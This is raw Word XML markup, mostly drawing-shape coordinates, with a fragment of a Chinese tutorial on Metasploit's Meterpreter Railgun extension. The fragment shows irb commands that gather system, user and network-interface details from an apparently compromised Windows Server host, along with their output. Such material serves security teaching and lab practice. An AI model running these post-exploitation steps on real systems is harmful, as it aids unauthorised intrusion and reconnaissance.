746,3118,14746,3117,14746,3116,14746,3114,14746,3113,14746,3112,14746,3110,14746,3109,14746,3108,14746,3106,14746,3105,14746,3103,14746,3102,14746,3100,14746,3099,14746,3097,14746,3095,14746,3094,14746,3092,14746,3090,14746,3088,14746,3086,14746,3084,14746,3083,14746,3081,14746,3079,14746,3076,14746,3074,14746,3072,14746,3070,14746,3068,14746,3065,14746,3063,14746,3061,14746,3058,14746,3056,14746,3053,14746,3051,14746,3048,14746,3045,14746,3043,14746,3040,14746,3037,14746,3034,14746,3031,14746,3029,14746,3026,14746,3026,14746,3026,14746,3026,14746,3026,14746,3026,14746,3026,14746,3026,14746,3026,14746,3026,14746,3026,14746,3026,14746,3026,14746,3026,14746,3026,14746,3026,14746,3026,14746,3026,14746,3026,14746,3026,14746,3026,14745,3026,14745,3026,14745,3026,14745,3026,14745,3026,14744,3026,14744,3026,14744,3026,14743,3026,14743,3026,14743,3026,14742,3026,14742,3026,14741,3026,14741,3026,14740,3026,14740,3026,14739,3026,14739,3026,14738,3026,14737,3026,14737,3026,14736,3026,14735,3026,14734,3026,14734,3026,14733,3026,14732,3026,14731,3026,14730,3026,14729,3026,14728,3026,14726,3026,14725,3026,14724,3026,14723,3026,14721,3026,14720,3026,14718,3026,14717,3026,14715,3026,14714,3026,14712,3026,14710,3026,14709,3026,14707,3026,14705,3026,14703,3026,14701,3026,14699,3026,14697,3026,14695,3026,14692,3026,14690,3026,14688,3026,14685,3026,14683,3026,14680,3026,14677,3026,14675,3026,14672,3026,14669,3026,14666,3026,14663,3026,14660,3026,14657,3026,14653,3026,14650,3026,14647,3026,14643,3026,14640,3026,14636,3026,14632,3026,14629,3026,14625,3026,14621,3026,14617,3026,14612,3026,14608,3026,14604,3026,14600,3026,14595,3026,14590,3026,14586,3026,14581,3026,14576,3026,14571,3026,14566,3026,14561,3026,14556,3026,14550,3026,14545,3026,14539,3026,14534,3026,14528,3026,14522,3026,14516,3026,14510,3026,14504,3026,14498,3026,14491e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:156.500pt;margin-top:723.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3130,14470" coordsize="130,270">
        <v:shape style="position:absolute;left:3130;top:14470;width:130;height:270" coordorigin="3130,14470" coordsize="130,270" path="m3146,14491l3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3146,14491,3147,14491,3147,14491,3147,14491,3147,14491,3147,14491,3147,14491,3148,14491,3148,14491,3148,14491,3148,14491,3148,14491,3149,14491,3149,14491,3149,14491,3149,14491,3150,14491,3150,14491,3150,14491,3151,14491,3151,14491,3152,14491,3152,14491,3153,14491,3153,14491,3153,14491,3154,14491,3154,14491,3155,14491,3156,14491,3156,14491,3157,14491,3157,14491,3158,14491,3159,14491,3159,14491,3160,14491,3161,14491,3162,14491,3163,14491,3163,14491,3164,14491,3165,14491,3166,14491,3167,14491,3168,14491,3169,14491,3170,14491,3171,14491,3172,14491,3173,14491,3174,14491,3176,14491,3177,14491,3178,14491,3179,14491,3181,14491,3182,14491,3183,14491,3185,14491,3186,14491,3188,14491,3189,14491,3191,14491,3192,14491,3194,14491,3196,14491,3198,14491,3199,14491,3201,14491,3203,14491,3205,14491,3207,14491,3209,14491,3211,14491,3213,14491,3215,14491,3217,14491,3219,14491,3221,14491,3223,14491,3226,14491,3228,14491,3230,14491,3233,14491,3235,14491,3238,14491,3240,14491,3243,14491,3246,14491,3248,14491,3251,14491,3254,14491,3257,14491,3260,14491,3263,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14492,3266,14492,3266,14492,3266,14492,3266,14492,3266,14492,3266,14492,3266,14492,3266,14492,3266,14493,3266,14493,3266,14493,3266,14493,3266,14493,3266,14494,3266,14494,3266,14494,3266,14495,3266,14495,3266,14495,3266,14496,3266,14496,3266,14497,3266,14497,3266,14498,3266,14498,3266,14499,3266,14500,3266,14500,3266,14501,3266,14502,3266,14503,3266,14503,3266,14504,3266,14505,3266,14506,3266,14507,3266,14508,3266,14509,3266,14510,3266,14511,3266,14513,3266,14514,3266,14515,3266,14516,3266,14518,3266,14519,3266,14521,3266,14522,3266,14524,3266,14526,3266,14527,3266,14529,3266,14531,3266,14533,3266,14535,3266,14537,3266,14539,3266,14541,3266,14543,3266,14545,3266,14548,3266,14550,3266,14553,3266,14555,3266,14558,3266,14560,3266,14563,3266,14566,3266,14569,3266,14572,3266,14575,3266,14578,3266,14581,3266,14584,3266,14588,3266,14591,3266,14594,3266,14598,3266,14602,3266,14605,3266,14609,3266,14613,3266,14617,3266,14621,3266,14625,3266,14629,3266,14634,3266,14638,3266,14643,3266,14647,3266,14652,3266,14657,3266,14662,3266,14667,3266,14672,3266,14677,3266,14682,3266,14687,3266,14693,3266,14698,3266,14704,3266,14710,3266,14716,3266,14722,3266,14728,3266,14734,3266,14740,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3265,14746,3264,14746,3264,14746,3264,14746,3264,14746,3264,14746,3264,14746,3263,14746,3263,14746,3263,14746,3263,14746,3262,14746,3262,14746,3262,14746,3261,14746,3261,14746,3261,14746,3260,14746,3260,14746,3260,14746,3259,14746,3259,14746,3258,14746,3258,14746,3257,14746,3257,14746,3256,14746,3256,14746,3255,14746,3254,14746,3254,14746,3253,14746,3252,14746,3252,14746,3251,14746,3250,14746,3249,14746,3249,14746,3248,14746,3247,14746,3246,14746,3245,14746,3244,14746,3243,14746,3242,14746,3241,14746,3240,14746,3239,14746,3238,14746,3237,14746,3236,14746,3234,14746,3233,14746,3232,14746,3231,14746,3229,14746,3228,14746,3226,14746,3225,14746,3223,14746,3222,14746,3220,14746,3219,14746,3217,14746,3215,14746,3214,14746,3212,14746,3210,14746,3208,14746,3206,14746,3205,14746,3203,14746,3201,14746,3199,14746,3197,14746,3194,14746,3192,14746,3190,14746,3188,14746,3186,14746,3183,14746,3181,14746,3178,14746,3176,14746,3173,14746,3171,14746,3168,14746,3166,14746,3163,14746,3160,14746,3157,14746,3154,14746,3152,14746,3149,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14746,3146,14745,3146,14745,3146,14745,3146,14745,3146,14745,3146,14744,3146,14744,3146,14744,3146,14743,3146,14743,3146,14743,3146,14742,3146,14742,3146,14741,3146,14741,3146,14740,3146,14740,3146,14739,3146,14739,3146,14738,3146,14737,3146,14737,3146,14736,3146,14735,3146,14734,3146,14734,3146,14733,3146,14732,3146,14731,3146,14730,3146,14729,3146,14728,3146,14726,3146,14725,3146,14724,3146,14723,3146,14721,3146,14720,3146,14718,3146,14717,3146,14715,3146,14714,3146,14712,3146,14710,3146,14709,3146,14707,3146,14705,3146,14703,3146,14701,3146,14699,3146,14697,3146,14695,3146,14692,3146,14690,3146,14688,3146,14685,3146,14683,3146,14680,3146,14677,3146,14675,3146,14672,3146,14669,3146,14666,3146,14663,3146,14660,3146,14657,3146,14653,3146,14650,3146,14647,3146,14643,3146,14640,3146,14636,3146,14632,3146,14629,3146,14625,3146,14621,3146,14617,3146,14612,3146,14608,3146,14604,3146,14600,3146,14595,3146,14590,3146,14586,3146,14581,3146,14576,3146,14571,3146,14566,3146,14561,3146,14556,3146,14550,3146,14545,3146,14539,3146,14534,3146,14528,3146,14522,3146,14516,3146,14510,3146,14504,3146,14498,3146,14491e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:162.500pt;margin-top:723.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3250,14470" coordsize="130,270">
        <v:shape style="position:absolute;left:3250;top:14470;width:130;height:270" coordorigin="3250,14470" coordsize="130,270" path="m3266,14491l3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3266,14491,3267,14491,3267,14491,3267,14491,3267,14491,3267,14491,3267,14491,3267,14491,3268,14491,3268,14491,3268,14491,3268,14491,3268,14491,3269,14491,3269,14491,3269,14491,3270,14491,3270,14491,3270,14491,3271,14491,3271,14491,3271,14491,3272,14491,3272,14491,3273,14491,3273,14491,3274,14491,3274,14491,3275,14491,3275,14491,3276,14491,3276,14491,3277,14491,3277,14491,3278,14491,3279,14491,3280,14491,3280,14491,3281,14491,3282,14491,3283,14491,3283,14491,3284,14491,3285,14491,3286,14491,3287,14491,3288,14491,3289,14491,3290,14491,3291,14491,3292,14491,3293,14491,3295,14491,3296,14491,3297,14491,3298,14491,3299,14491,3301,14491,3302,14491,3304,14491,3305,14491,3306,14491,3308,14491,3309,14491,3311,14491,3313,14491,3314,14491,3316,14491,3318,14491,3319,14491,3321,14491,3323,14491,3325,14491,3327,14491,3329,14491,3331,14491,3333,14491,3335,14491,3337,14491,3339,14491,3341,14491,3343,14491,3346,14491,3348,14491,3350,14491,3353,14491,3355,14491,3358,14491,3360,14491,3363,14491,3366,14491,3368,14491,3371,14491,3374,14491,3377,14491,3380,14491,3383,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14492,3386,14492,3386,14492,3386,14492,3386,14492,3386,14492,3386,14492,3386,14492,3386,14492,3386,14493,3386,14493,3386,14493,3386,14493,3386,14493,3386,14494,3386,14494,3386,14494,3386,14495,3386,14495,3386,14495,3386,14496,3386,14496,3386,14497,3386,14497,3386,14498,3386,14498,3386,14499,3386,14500,3386,14500,3386,14501,3386,14502,3386,14503,3386,14503,3386,14504,3386,14505,3386,14506,3386,14507,3386,14508,3386,14509,3386,14510,3386,14511,3386,14513,3386,14514,3386,14515,3386,14516,3386,14518,3386,14519,3386,14521,3386,14522,3386,14524,3386,14526,3386,14527,3386,14529,3386,14531,3386,14533,3386,14535,3386,14537,3386,14539,3386,14541,3386,14543,3386,14545,3386,14548,3386,14550,3386,14553,3386,14555,3386,14558,3386,14560,3386,14563,3386,14566,3386,14569,3386,14572,3386,14575,3386,14578,3386,14581,3386,14584,3386,14588,3386,14591,3386,14594,3386,14598,3386,14602,3386,14605,3386,14609,3386,14613,3386,14617,3386,14621,3386,14625,3386,14629,3386,14634,3386,14638,3386,14643,3386,14647,3386,14652,3386,14657,3386,14662,3386,14667,3386,14672,3386,14677,3386,14682,3386,14687,3386,14693,3386,14698,3386,14704,3386,14710,3386,14716,3386,14722,3386,14728,3386,14734,3386,14740,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3385,14746,3385,14746,3385,14746,3385,14746,3385,14746,3385,14746,3385,14746,3385,14746,3385,14746,3385,14746,3385,14746,3384,14746,3384,14746,3384,14746,3384,14746,3384,14746,3384,14746,3383,14746,3383,14746,3383,14746,3383,14746,3382,14746,3382,14746,3382,14746,3381,14746,3381,14746,3381,14746,3380,14746,3380,14746,3380,14746,3379,14746,3379,14746,3378,14746,3378,14746,3377,14746,3377,14746,3376,14746,3376,14746,3375,14746,3374,14746,3374,14746,3373,14746,3373,14746,3372,14746,3371,14746,3370,14746,3370,14746,3369,14746,3368,14746,3367,14746,3366,14746,3365,14746,3364,14746,3363,14746,3362,14746,3361,14746,3360,14746,3359,14746,3358,14746,3357,14746,3356,14746,3354,14746,3353,14746,3352,14746,3351,14746,3349,14746,3348,14746,3346,14746,3345,14746,3343,14746,3342,14746,3340,14746,3339,14746,3337,14746,3335,14746,3334,14746,3332,14746,3330,14746,3328,14746,3327,14746,3325,14746,3323,14746,3321,14746,3319,14746,3317,14746,3314,14746,3312,14746,3310,14746,3308,14746,3306,14746,3303,14746,3301,14746,3298,14746,3296,14746,3293,14746,3291,14746,3288,14746,3286,14746,3283,14746,3280,14746,3277,14746,3274,14746,3272,14746,3269,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14746,3266,14745,3266,14745,3266,14745,3266,14745,3266,14745,3266,14744,3266,14744,3266,14744,3266,14743,3266,14743,3266,14743,3266,14742,3266,14742,3266,14741,3266,14741,3266,14740,3266,14740,3266,14739,3266,14739,3266,14738,3266,14737,3266,14737,3266,14736,3266,14735,3266,14734,3266,14734,3266,14733,3266,14732,3266,14731,3266,14730,3266,14729,3266,14728,3266,14726,3266,14725,3266,14724,3266,14723,3266,14721,3266,14720,3266,14718,3266,14717,3266,14715,3266,14714,3266,14712,3266,14710,3266,14709,3266,14707,3266,14705,3266,14703,3266,14701,3266,14699,3266,14697,3266,14695,3266,14692,3266,14690,3266,14688,3266,14685,3266,14683,3266,14680,3266,14677,3266,14675,3266,14672,3266,14669,3266,14666,3266,14663,3266,14660,3266,14657,3266,14653,3266,14650,3266,14647,3266,14643,3266,14640,3266,14636,3266,14632,3266,14629,3266,14625,3266,14621,3266,14617,3266,14612,3266,14608,3266,14604,3266,14600,3266,14595,3266,14590,3266,14586,3266,14581,3266,14576,3266,14571,3266,14566,3266,14561,3266,14556,3266,14550,3266,14545,3266,14539,3266,14534,3266,14528,3266,14522,3266,14516,3266,14510,3266,14504,3266,14498,3266,14491e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:168.500pt;margin-top:723.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3370,14470" coordsize="130,270">
        <v:shape style="position:absolute;left:3370;top:14470;width:130;height:270" coordorigin="3370,14470" coordsize="130,270" path="m3386,14491l3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3386,14491,3387,14491,3387,14491,3387,14491,3387,14491,3387,14491,3387,14491,3387,14491,3388,14491,3388,14491,3388,14491,3388,14491,3389,14491,3389,14491,3389,14491,3389,14491,3390,14491,3390,14491,3390,14491,3391,14491,3391,14491,3391,14491,3392,14491,3392,14491,3393,14491,3393,14491,3394,14491,3394,14491,3395,14491,3395,14491,3396,14491,3396,14491,3397,14491,3398,14491,3398,14491,3399,14491,3400,14491,3400,14491,3401,14491,3402,14491,3403,14491,3404,14491,3404,14491,3405,14491,3406,14491,3407,14491,3408,14491,3409,14491,3410,14491,3411,14491,3412,14491,3413,14491,3415,14491,3416,14491,3417,14491,3418,14491,3420,14491,3421,14491,3422,14491,3424,14491,3425,14491,3426,14491,3428,14491,3429,14491,3431,14491,3433,14491,3434,14491,3436,14491,3438,14491,3439,14491,3441,14491,3443,14491,3445,14491,3447,14491,3449,14491,3451,14491,3453,14491,3455,14491,3457,14491,3459,14491,3461,14491,3464,14491,3466,14491,3468,14491,3471,14491,3473,14491,3475,14491,3478,14491,3481,14491,3483,14491,3486,14491,3489,14491,3491,14491,3494,14491,3497,14491,3500,14491,3503,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14491,3506,14492,3506,14492,3506,14492,3506,14492,3506,14492,3506,14492,3506,14492,3506,14492,3506,14492,3506,14493,3506,14493,3506,14493,3506,14493,3506,14493,3506,14494,3506,14494,3506,14494,3506,14495,3506,14495,3506,14495,3506,14496,3506,14496,3506,14497,3506,14497,3506,14498,3506,14498,3506,14499,3506,14500,3506,14500,3506,14501,3506,14502,3506,14503,3506,14503,3506,14504,3506,14505,3506,14506,3506,14507,3506,14508,3506,14509,3506,14510,3506,14511,3506,14513,3506,14514,3506,14515,3506,14516,3506,14518,3506,14519,3506,14521,3506,14522,3506,14524,3506,14526,3506,14527,3506,14529,3506,14531,3506,14533,3506,14535,3506,14537,3506,14539,3506,14541,3506,14543,3506,14545,3506,14548,3506,14550,3506,14553,3506,14555,3506,14558,3506,14560,3506,14563,3506,14566,3506,14569,3506,14572,3506,14575,3506,14578,3506,14581,3506,14584,3506,14588,3506,14591,3506,14594,3506,14598,3506,14602,3506,14605,3506,14609,3506,14613,3506,14617,3506,14621,3506,14625,3506,14629,3506,14634,3506,14638,3506,14643,3506,14647,3506,14652,3506,14657,3506,14662,3506,14667,3506,14672,3506,14677,3506,14682,3506,14687,3506,14693,3506,14698,3506,14704,3506,14710,3506,14716,3506,14722,3506,14728,3506,14734,3506,14740,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3506,14746,3505,14746,3505,14746,3505,14746,3505,14746,3505,14746,3505,14746,3505,14746,3505,14746,3505,14746,3505,14746,3505,14746,3504,14746,3504,14746,3504,14746,3504,14746,3504,14746,3503,14746,3503,14746,3503,14746,3503,14746,3502,14746,3502,14746,3502,14746,3502,14746,3501,14746,3501,14746,3500,14746,3500,14746,3500,14746,3499,14746,3499,14746,3498,14746,3498,14746,3497,14746,3497,14746,3496,14746,3496,14746,3495,14746,3495,14746,3494,14746,3493,14746,3493,14746,3492,14746,3491,14746,3490,14746,3490,14746,3489,14746,3488,14746,3487,14746,3486,14746,3485,14746,3484,14746,3483,14746,3482,14746,3481,14746,3480,14746,3479,14746,3478,14746,3477,14746,3476,14746,3474,14746,3473,14746,3472,14746,3471,14746,3469,14746,3468,14746,3466,14746,3465,14746,3464,14746,3462,14746,3460,14746,3459,14746,3457,14746,3456,14746,3454,14746,3452,14746,3450,14746,3448,14746,3447,14746,3445,14746,3443,14746,3441,14746,3439,14746,3437,14746,3435,14746,3432,14746,3430,14746,3428,14746,3426,14746,3423,14746,3421,14746,3418,14746,3416,14746,3413,14746,3411,14746,3408,14746,3406,14746,3403,14746,3400,14746,3397,14746,3395,14746,3392,14746,3389,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14746,3386,14745,3386,14745,3386,14745,3386,14745,3386,14745,3386,14744,3386,14744,3386,14744,3386,14743,3386,14743,3386,14743,3386,14742,3386,14742,3386,14741,3386,14741,3386,14740,3386,14740,3386,14739,3386,14739,3386,14738,3386,14737,3386,14737,3386,14736,3386,14735,3386,14734,3386,14734,3386,14733,3386,14732,3386,14731,3386,14730,3386,14729,3386,14728,3386,14726,3386,14725,3386,14724,3386,14723,3386,14721,3386,14720,3386,14718,3386,14717,3386,14715,3386,14714,3386,14712,3386,14710,3386,14709,3386,14707,3386,14705,3386,14703,3386,14701,3386,14699,3386,14697,3386,14695,3386,14692,3386,14690,3386,14688,3386,14685,3386,14683,3386,14680,3386,14677,3386,14675,3386,14672,3386,14669,3386,14666,3386,14663,3386,14660,3386,14657,3386,14653,3386,14650,3386,14647,3386,14643,3386,14640,3386,14636,3386,14632,3386,14629,3386,14625,3386,14621,3386,14617,3386,14612,3386,14608,3386,14604,3386,14600,3386,14595,3386,14590,3386,14586,3386,14581,3386,14576,3386,14571,3386,14566,3386,14561,3386,14556,3386,14550,3386,14545,3386,14539,3386,14534,3386,14528,3386,14522,3386,14516,3386,14510,3386,14504,3386,14498,3386,1449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38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Railgun是Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-22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stdapi的扩展，允许任意加载DLL。Railgun的最大好处是能够动态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访问系统上的整个Windows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API。通过从用户进程调用Windows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API。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meterpreter下执行irb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进入ruby交互。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基</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本的信息搜集：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config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sysinfo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[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'OS'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.NET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(Build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3790,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Pack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2)."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sys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config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getuid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"WIN03X64\\Administrator"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interfaces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config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interfaces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129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2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#&lt;Rex::Post::Meterpreter::Extensions::Stdapi::Net::Interface:0x000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055aee92c5770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@index=65539,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@mac_addr="\x00\f)\x85\xD6}",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@mac_name="Inte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l(R)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PRO/1000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MT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Network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Connection",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@mtu=1500,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@flags=nil,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@addrs=["19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2.168.1.119"],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@netmasks=["255.255.255.0"],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@scopes=[]&gt;,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#&lt;Rex::Post::Met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erpreter::Extensions::Stdapi::Net::Interface:0x000055aee92c5220</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@index=1,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@mac_addr="",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@mac_name="MS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Loopback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interface",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@mtu=1520,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@flags=ni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l,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@addrs=["127.0.0.1"],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@netmasks=[],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@scopes=[]&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="9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interfaces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each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do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?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puts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i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pretty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11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1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0076a9"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>end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65539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Intel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PRO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Network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Hardware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MAC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85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:d6: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7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MTU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1500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IPv4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.119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IPv4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Netmask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255.255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.255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0053"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1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Loopback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interface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Hardware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MAC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222.586pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,4451">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:4451" coordorigin="10402,0" coordsize="0,4451" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,3,10402,4,10402,5,10402,7,10402,8,10402,10,10402,12,10402,15,10402,18,10402,21,10402,24,10402,28,10402,32,10402,36,10402,41,10402,46,10402,51,10402,57,10402,64,10402,71,10402,78,10402,86,10402,94,10402,103,10402,113,10402,123,10402,133,10402,144,10402,156,10402,169,10402,182,10402,195,10402,210,10402,225,10402,240,10402,257,10402,274,10402,292,10402,310,10402,330,10402,350,10402,371,10402,393,10402,415,10402,439,10402,463,10402,489,10402,515,10402,542,10402,570,10402,599,10402,629,10402,660,10402,692,10402,725,10402,759,10402,794,10402,830,10402,867,10402,906,10402,945,10402,986,10402,1027,10402,1070,10402,1114,10402,1159,10402,1206,10402,1253,10402,1302,10402,1352,10402,1403,10402,1456,10402,1510,10402,1565,10402,1622,10402,1680,10402,1739,10402,1800,10402,1862,10402,1925,10402,1990,10402,2057,10402,2124,10402,2194,10402,2264,10402,2337,10402,2411,10402,2486,10402,2563,10402,2641,10402,2721,10402,2803,10402,2886,10402,2971,10402,3058,10402,3146,10402,3236,10402,3327,10402,3421,10402,3516,10402,3612,10402,3711,10402,3811,10402,3913,10402,4017,10402,4123,10402,4231,10402,4340,10402,4451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00.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1710" coordsize="8990,2010">
        <v:shape style="position:absolute;left:1490;top:1710;width:8990;height:2010" coordorigin="1490,1710" coordsize="8990,201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6,10484,1736,10484,1736,10484,1737,10484,1737,10484,1738,10484,1739,10484,1740,10484,1741,10484,1742,10484,1743,10484,1744,10484,1746,10484,1747,10484,1749,10484,1751,10484,1753,10484,1756,10484,1758,10484,1761,10484,1764,10484,1767,10484,1770,10484,1774,10484,1777,10484,1781,10484,1786,10484,1790,10484,1795,10484,1800,10484,1805,10484,1811,10484,1817,10484,1823,10484,1829,10484,1836,10484,1843,10484,1850,10484,1858,10484,1866,10484,1874,10484,1883,10484,1892,10484,1901,10484,1911,10484,1921,10484,1932,10484,1943,10484,1954,10484,1966,10484,1978,10484,1991,10484,2004,10484,2017,10484,2031,10484,2045,10484,2060,10484,2075,10484,2091,10484,2107,10484,2124,10484,2141,10484,2159,10484,2177,10484,2196,10484,2215,10484,2235,10484,2255,10484,2276,10484,2297,10484,2319,10484,2341,10484,2364,10484,2388,10484,2412,10484,2437,10484,2462,10484,2488,10484,2515,10484,2542,10484,2570,10484,2598,10484,2627,10484,2657,10484,2688,10484,2719,10484,2750,10484,2783,10484,2816,10484,2850,10484,2884,10484,2919,10484,2955,10484,2992,10484,3029,10484,3067,10484,3106,10484,3146,10484,3186,10484,3227,10484,3269,10484,3311,10484,3355,10484,3399,10484,3444,10484,3490,10484,3536,10484,3584,10484,3632,10484,3681,10484,3731,10484,3731,10484,3731,10484,3731,10484,3731,10484,3731,10484,3731,10483,3731,10482,3731,10482,3731,10480,3731,10479,3731,10477,3731,10475,3731,10473,3731,10470,3731,10466,3731,10462,3731,10458,3731,10453,3731,10448,3731,10442,3731,10435,3731,10428,3731,10419,3731,10411,3731,10401,3731,10391,3731,10379,3731,10367,3731,10354,3731,10340,3731,10326,3731,10310,3731,10293,3731,10275,3731,10256,3731,10236,3731,10215,3731,10192,3731,10168,3731,10143,3731,10117,3731,10090,3731,10061,3731,10031,3731,9999,3731,9966,3731,9931,3731,9895,3731,9858,3731,9819,3731,9778,3731,9735,3731,9691,3731,9646,3731,9598,3731,9549,3731,9498,3731,9445,3731,9391,3731,9334,3731,9275,3731,9215,3731,9153,3731,9088,3731,9022,3731,8953,3731,8883,3731,8810,3731,8735,3731,8658,3731,8578,3731,8497,3731,8413,3731,8326,3731,8238,3731,8146,3731,8053,3731,7957,3731,7859,3731,7758,3731,7654,3731,7548,3731,7439,3731,7328,3731,7214,3731,7097,3731,6977,3731,6855,3731,6730,3731,6602,3731,6471,3731,6337,3731,6201,3731,6061,3731,5918,3731,5773,3731,5624,3731,5472,3731,5317,3731,5159,3731,4997,3731,4833,3731,4665,3731,4494,3731,4319,3731,4141,3731,3960,3731,3776,3731,3587,3731,3396,3731,3201,3731,3002,3731,2800,3731,2594,3731,2385,3731,2172,3731,1955,3731,1734,3731,1510,3731,1510,3731,1510,3731,1510,3731,1510,3731,1510,3731,1510,3731,1510,3731,1510,3730,1510,3730,1510,3730,1510,3730,1510,3729,1510,3729,1510,3728,1510,3728,1510,3727,1510,3726,1510,3725,1510,3724,1510,3723,1510,3721,1510,3720,1510,3718,1510,3716,1510,3715,1510,3712,1510,3710,1510,3708,1510,3705,1510,3702,1510,3699,1510,3696,1510,3692,1510,3688,1510,3684,1510,3680,1510,3676,1510,3671,1510,3666,1510,3661,1510,3655,1510,3649,1510,3643,1510,3637,1510,3630,1510,3623,1510,3616,1510,3608,1510,3600,1510,3592,1510,3583,1510,3574,1510,3564,1510,3555,1510,3544,1510,3534,1510,3523,1510,3512,1510,3500,1510,3488,1510,3475,1510,3462,1510,3449,1510,3435,1510,3420,1510,3406,1510,3390,1510,3375,1510,3358,1510,3342,1510,3325,1510,3307,1510,3289,1510,3270,1510,3251,1510,3231,1510,3211,1510,3190,1510,3169,1510,3147,1510,3124,1510,3101,1510,3078,1510,3054,1510,3029,1510,3003,1510,2977,1510,2951,1510,2924,1510,2896,1510,2867,1510,2838,1510,2809,1510,2778,1510,2747,1510,2715,1510,2683,1510,2650,1510,2616,1510,2582,1510,2546,1510,2511,1510,2474,1510,2437,1510,2399,1510,2360,1510,2320,1510,2280,1510,2239,1510,2197,1510,2154,1510,2111,1510,2067,1510,2022,1510,1976,1510,1929,1510,1882,1510,1834,1510,1785,1510,1735e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
